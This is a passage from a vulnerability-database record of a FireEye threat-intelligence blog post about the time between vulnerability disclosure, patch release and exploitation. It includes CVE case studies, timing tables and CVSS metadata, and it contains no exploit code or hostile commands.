conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\n![Time between vulnerability exploitation and patch issuance](https://www.fireeye.com/sites/default/files/inline-images/think-fast2.png)Figure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\n![Timeline of activity for CVE-2018-15982](https://www.fireeye.com/sites/default/files/inline-images/think-fast3.png)Figure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\n![Timeline of activity for CVE-2018-20250](https://www.fireeye.com/sites/default/files/inline-images/think-fast4.png)Figure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\n![Timeline of Activity for CVE-2018-4878](https://www.fireeye.com/sites/default/files/inline-images/think-fast5.png)Figure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\n![Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019](https://www.fireeye.com/sites/default/files/inline-images/think-fast6.png)Figure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities

Description

Related